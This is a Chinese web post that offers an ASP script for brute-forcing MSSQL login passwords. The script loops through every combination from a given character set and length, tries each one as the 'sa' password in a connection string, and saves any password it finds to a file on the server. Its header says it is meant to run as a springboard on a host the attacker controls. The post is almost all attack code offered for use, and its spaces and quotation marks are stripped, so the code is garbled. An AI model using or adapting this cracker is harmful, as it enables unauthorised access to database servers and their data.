用ASP实现MSSQL用户密码破解

　　自己把以下代码保存为ASP文件。当然我还是一如既往的BS那些只改作者名字的家伙。

复制代码 代码如下:
<%
============ASPPortScannerbylake2===================

Version:0.1
ForSpringBoard
==========================================================
%>
<styletype=text/css>
body,td,th{color:#0000FF;font-family:Verdana,Arial,Helvetica,sans-serif;}
body{background-color:#ffffff;font-size:14px;}
a:link{color:#0000FF;text-decoration:none;}
a:visited{text-decoration:none;color:#0000FF;}
a:hover{text-decoration:none;color:#FF0000;}
a:active{text-decoration:none;color:#FF0000;}
.buttom{color:#FFFFFF;border:1pxsolid#084B8E;background-color:#719BC5}
.TextBox{border:1pxsolid#084B8E}
.styleRed{color:#FF0000}
</style>
<title>MSSQLCrackerforSpringBoard</title>
<%
DimPassword()
IfRequest.Form(go)<>1Then
%>
<divalign=center>Welcometo<ahref=
<formname=form1method=postaction=onSubmit=form1.Submit.disabled=true;>
ConnStr:
<inputname=conntype=textclass=TextBoxid=connvalue=Provider=SQLOLEDB.1;DataSource=127.0.0.1;UserID=sa;Password={PASS};size=70>
<br>
Char:
<inputname=chartype=textclass=TextBoxid=charvalue=0123456789size=30>
<br>
Length:
<inputname=lentype=textclass=TextBoxid=lenvalue=3size=4>
<br>
Path:
<inputname=pathtype=textclass=TextBoxvalue=<%=Server.MapPath(r.txt)%>size=50>
<inputname=CFiletype=checkboxclass=TextBoxid=CFilevalue=1checked>
Enablel<br>
<inputname=gotype=hiddenid=govalue=1>
<br>
<inputname=Submittype=submitclass=buttomid=Submitvalue=Run>
</form>
<%
Else
timer1=timer
Server.ScriptTimeout=7776000
ConnStr=Request.Form(Conn)
Char=request.Form(char)
LenChar=Len(Char)
ReDimpassword(LenChar)
Fori=1toLenChar
password(i)=Mid(Char,i,1)
Next
length=CInt(request.Form(len))
CallLAKE()
response.WriteDone!<br>Process&tTime&s
Ifrequest.Form(CFile)<>ThenCreateResult(Done!&vbcrlf&tTime)
EndIf

SubLAKE(str)
IfLen(str)>=lengthThenExitSub
Forj=1toLenChar
pass=str&password(j)
IfLen(pass)=lengthThenCallCrack(pass)
CallLAKE(pass)
Next
EndSub

SubCrack(str)
OnErrorResumeNext
conn.openReplace(ConnStr,{PASS},str)
IfErrThen
IfErr.Number<>-2147217843Then
response.Write(Err.Description&<BR>)
response.End()
EndIf
Else
response.Write(IGetit!Passwordis<fontcolor=red>&str&</font><BR>Process&tTime&s)
Ifrequest.Form(CFile)<>ThenCreateResult(str&vbcrlf&tTime)
response.End()
EndIf
EndSub

FunctiontTime()
timer2=timer
thetime=cstr(int(timer2-timer1))
tTime=thetime
EndFunction

SubCreateResult(t)
Setfs=CreateObject(Scripting.FileSystemObject)
Setoutfile=fs.CreateTextFile(request.Form(path))
outfile.WriteLinet
Setfs=Nothing
EndSub
%>